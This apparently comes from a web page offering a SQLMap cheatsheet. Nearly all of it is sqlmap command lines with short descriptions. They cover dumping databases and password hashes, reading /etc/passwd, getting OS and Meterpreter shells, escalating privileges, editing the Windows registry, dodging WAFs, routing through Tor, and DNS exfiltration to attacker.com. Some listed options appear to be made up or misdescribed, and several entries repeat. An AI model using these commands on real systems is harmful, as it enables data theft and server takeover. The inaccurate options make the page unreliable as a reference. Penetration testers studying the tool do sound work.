SQLMap Cheatsheet

The Ultimate SQL Injection Tool Reference Guide

Basic SQLMap Usage

Basic URL Test
sqlmap -u "http://example.com/page.php?id=1"
Test a URL for SQL injection vulnerabilities.
Check for WAF
sqlmap -u "http://example.com" --check-waf
Check if target is protected by a WAF/IPS/IDS.
List All Databases
sqlmap -u "http://example.com/page.php?id=1" --dbs
Enumerate available databases.
List Tables
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
List tables in a specific database.
Dump Table Data
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Dump the contents of a specific table.
Batch Mode
sqlmap -u "http://example.com/page.php?id=1" --batch
Run in batch mode (use default choices).
Verbose Output
sqlmap -u "http://example.com/page.php?id=1" -v 3
Set verbosity level (0-6, default 1).
Save Session
sqlmap -u "http://example.com/page.php?id=1" --save
Save session data to a .sqlmap file.
Resume Session
sqlmap --resume session_file
Resume a saved session.

Target Specification

Direct Connection
sqlmap -d "mysql://user:pass@host:port/dbname"
Connect directly to the database.
Multiple Targets
sqlmap -m targets.txt
Scan multiple targets from a file.
Google Dork
sqlmap -g "inurl:index.php?id="
Process Google dork results as targets.
Log File
sqlmap -l logfile.log
Parse targets from Burp or WebScarab log.
Request File
sqlmap -r request.txt
Load HTTP request from a file.
Crawl Website
sqlmap -u "http://example.com" --crawl=2
Crawl website starting from given URL.
Sitemap
sqlmap -u "http://example.com" --sitemap=url
Parse target(s) from remote sitemap(.xml).

Request Configuration

HTTP Method
sqlmap -u "http://example.com" --method=POST
Force usage of specific HTTP method.
POST Data
sqlmap -u "http://example.com" --data="id=1"
Specify POST data string.
Parameter Testing
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id,cat"
Test specific parameter(s) for injection.
Skip Static Parameters
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
Skip testing of specific parameter(s).
Cookie Injection
sqlmap -u "http://example.com" --cookie="id=1" --level=2
Test for cookie-based injection.
User-Agent Injection
sqlmap -u "http://example.com" --user-agent="sqlmap" --level=3
Test for user-agent-based injection.
Referer Injection
sqlmap -u "http://example.com" --referer="http://google.com" --level=3
Test for referer-based injection.
Headers File
sqlmap -u "http://example.com" --headers="headers.txt"
Load additional headers from file.
HTTP Authentication
sqlmap -u "http://example.com" --auth-type=BASIC --auth-cred="user:pass"
Specify HTTP authentication credentials.
Proxy Usage
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080"
Use a proxy to connect to the target.
Tor Routing
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor
Route traffic through Tor network.
Delay Between Requests
sqlmap -u "http://example.com" --delay=1
Delay in seconds between each request.
Timeout
sqlmap -u "http://example.com" --timeout=30
Seconds to wait before timeout (default 30).
Retries
sqlmap -u "http://example.com" --retries=3
Retries when connection times out (default 3).
Random Agent
sqlmap -u "http://example.com" --random-agent
Use randomly selected HTTP User-Agent header.
Host Header
sqlmap -u "http://example.com" --host="custom.example.com"
Specify custom Host header.

Database Enumeration

Current User
sqlmap -u "http://example.com" --current-user
Get database current user.
Current Database
sqlmap -u "http://example.com" --current-db
Get database current database name.
Server Hostname
sqlmap -u "http://example.com" --hostname
Get database server hostname.
Check if DBA
sqlmap -u "http://example.com" --is-dba
Check if current user is DBA.
List Users
sqlmap -u "http://example.com" --users
List database users.
List Privileges
sqlmap -u "http://example.com" --privileges
List database users privileges.
User Password Hashes
sqlmap -u "http://example.com" --passwords
Enumerate user password hashes.
List Roles
sqlmap -u "http://example.com" --roles
List database roles.
List Databases
sqlmap -u "http://example.com" --dbs
List available databases.
List Tables
sqlmap -u "http://example.com" -D database_name --tables
List tables in a specific database.
List Columns
sqlmap -u "http://example.com" -D database_name -T table_name --columns
List columns in a specific table.
Dump Table
sqlmap -u "http://example.com" -D database_name -T table_name --dump
Dump table entries.
Dump Specific Columns
sqlmap -u "http://example.com" -D database_name -T table_name -C column1,column2 --dump
Dump specific columns from a table.
Count Table Entries
sqlmap -u "http://example.com" -D database_name -T table_name --count
Count number of entries in table.
Schema Enumeration
sqlmap -u "http://example.com" --schema
Enumerate database schema.
Search for Data
sqlmap -u "http://example.com" --search -T user
Search for tables/columns matching pattern.
Comments
sqlmap -u "http://example.com" --comments
Enumerate database comments.
DBMS Version
sqlmap -u "http://example.com" --banner
Get DBMS banner/version.

Injection Techniques

Test All Techniques
sqlmap -u "http://example.com" --technique=BEUSTQ
Test all SQL injection techniques (default).
Boolean-Based Blind
sqlmap -u "http://example.com" --technique=B
Boolean-based blind SQL injection.
Error-Based
sqlmap -u "http://example.com" --technique=E
Error-based SQL injection.
UNION Query
sqlmap -u "http://example.com" --technique=U
UNION query-based SQL injection.
Stacked Queries
sqlmap -u "http://example.com" --technique=S
Stacked queries SQL injection.
Time-Based Blind
sqlmap -u "http://example.com" --technique=T
Time-based blind SQL injection.
Inline Queries
sqlmap -u "http://example.com" --technique=Q
Inline queries SQL injection.
Second-Order Injection
sqlmap -u "http://example.com" --second-order="http://example.com/response.php"
Second-order SQL injection.
Test Parameter
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"
Test specific parameter for injection.
Skip Static Parameters
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
Skip testing of specific parameter(s).
Custom Injection Point
sqlmap -u "http://example.com/page.php?id=1*" --prefix="'" --suffix="AND '1'='1"
Specify custom injection point with prefix/suffix.
Tamper Scripts
sqlmap -u "http://example.com" --tamper="between.py,randomcase.py"
Use tamper scripts to obfuscate injection data.
Level and Risk
sqlmap -u "http://example.com" --level=3 --risk=3
Set test level (1-5) and risk (1-3) for more thorough tests.

Optimization Options

Predict Output
sqlmap -u "http://example.com" --predict-output
Predict common queries output.
Keep-Alive
sqlmap -u "http://example.com" --keep-alive
Use persistent HTTP(s) connections.
Null Connection
sqlmap -u "http://example.com" --null-connection
Retrieve page length without actual HTTP response.
Threads
sqlmap -u "http://example.com" --threads=5
Max number of concurrent HTTP requests (1-10).
Optimize
sqlmap -u "http://example.com" -o
Turn on all optimization switches.
Force DNS Resolution
sqlmap -u "http://example.com" --force-dns
Force DNS resolution for all targets.
Fresh Queries
sqlmap -u "http://example.com" --fresh-queries
Ignore query results stored in session file.

Injection Options

DBMS Fingerprint
sqlmap -u "http://example.com" --fingerprint
Perform extensive DBMS version fingerprint.
String to Inject
sqlmap -u "http://example.com" --string="Welcome back"
String to match when query is evaluated to True.
Not String
sqlmap -u "http://example.com" --not-string="Error"
String to match when query is evaluated to False.
Regexp
sqlmap -u "http://example.com" --regexp="Welcome \w+"
Regexp to match when query is evaluated to True.
Code
sqlmap -u "http://example.com" --code=200
HTTP code to match when query is evaluated to True.
Text-Only
sqlmap -u "http://example.com" --text-only
Compare pages based only on the textual content.
Titles
sqlmap -u "http://example.com" --titles
Compare pages based only on their titles.
Union Columns
sqlmap -u "http://example.com" --union-cols=17-23
Range of columns to test for UNION query injection.
Union Char
sqlmap -u "http://example.com" --union-char=123
Character to use for bruteforcing number of columns.
Union From
sqlmap -u "http://example.com" --union-from=users
Table to use in FROM part of UNION query injection.
DNS Exfiltration
sqlmap -u "http://example.com" --dns-domain=attacker.com
Use DNS exfiltration for data retrieval.

Brute Force Options

Brute Force Tables
sqlmap -u "http://example.com" --common-tables
Bruteforce common tables names.
Brute Force Columns
sqlmap -u "http://example.com" --common-columns
Bruteforce common columns names.
Brute Force Files
sqlmap -u "http://example.com" --common-files
Bruteforce common files.
Brute Force Chars
sqlmap -u "http://example.com" --charset="0123456789abcdef"
Bruteforce charset for hash cracking.

File System Access

Read File
sqlmap -u "http://example.com" --file-read="/etc/passwd"
Read a file from the database server.
Write File
sqlmap -u "http://example.com" --file-write="local.txt" --file-dest="/remote/path/remote.txt"
Write a local file on the database server.
Directory List
sqlmap -u "http://example.com" --list-directories="C:/"
List directories on the database server.

Operating System Access

OS Shell
sqlmap -u "http://example.com" --os-shell
Prompt for an interactive OS shell.
OS Pwn
sqlmap -u "http://example.com" --os-pwn
Prompt for an OOB shell, Meterpreter or VNC.
OS Cmd
sqlmap -u "http://example.com" --os-cmd="id"
Execute an OS command.
OS Bof
sqlmap -u "http://example.com" --os-bof
Stored procedure buffer overflow exploitation.
Privilege Escalation
sqlmap -u "http://example.com" --priv-esc
Database process user privilege escalation.
MSF Path
sqlmap -u "http://example.com" --msf-path=/opt/metasploit
Local path where Metasploit Framework is installed.

Windows-Specific Options

Reg Read
sqlmap -u "http://example.com" --reg-read
Read a Windows registry key value.
Reg Add
sqlmap -u "http://example.com" --reg-add
Write a Windows registry key value.
Reg Del
sqlmap -u "http://example.com" --reg-del
Delete a Windows registry key value.
Reg Key
sqlmap -u "http://example.com" --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
Specify Windows registry key.
Reg Value
sqlmap -u "http://example.com" --reg-value="InstallPath"
Specify Windows registry key value.
Reg Data
sqlmap -u "http://example.com" --reg-data="C:\Program Files"
Specify Windows registry key value data.
Reg Type
sqlmap -u "http://example.com" --reg-type="REG_SZ"
Specify Windows registry key value type.

Miscellaneous Options

Parse Errors
sqlmap -u "http://example.com" --parse-errors
Parse and display DBMS error messages.
Cleanup
sqlmap -u "http://example.com" --cleanup
Clean up the DBMS from sqlmap specific UDF and tables.
Flush Session
sqlmap -u "http://example.com" --flush-session
Flush session files for current target.
Check Internet
sqlmap -u "http://example.com" --check-internet
Check Internet connection before assessing the target.
Alerts
sqlmap -u "http://example.com" --alert="ALERT"
Run host OS command(s) when SQL injection is found.
Answers
sqlmap -u "http://example.com" --answers="follow=Y"
Set predefined answers (e.g. “quit=N,follow=N”).
Beep
sqlmap -u "http://example.com" --beep
Beep on question and/or when SQL injection is found.
Dependencies
sqlmap -u "http://example.com" --dependencies
Check for missing (optional) sqlmap dependencies.
Disable Coloring
sqlmap -u "http://example.com" --disable-coloring
Disable console output coloring.
Google Page
sqlmap -u "http://example.com" --gpage=2
Use Google dork results from specified page number.
Page Compare
sqlmap -u "http://example.com" --page-compare
Compare pages based on their content length.
Skip WAF
sqlmap -u "http://example.com" --skip-waf
Skip heuristic detection of WAF/IPS/IDS protection.
Smart
sqlmap -u "http://example.com" --smart
Conduct thorough tests only if positive heuristic(s).
Sqlmap Shell
sqlmap --sqlmap-shell
Prompt for an interactive sqlmap shell.
Wizard
sqlmap --wizard
Simple wizard interface for beginner users.

Similar Posts

Leave a Reply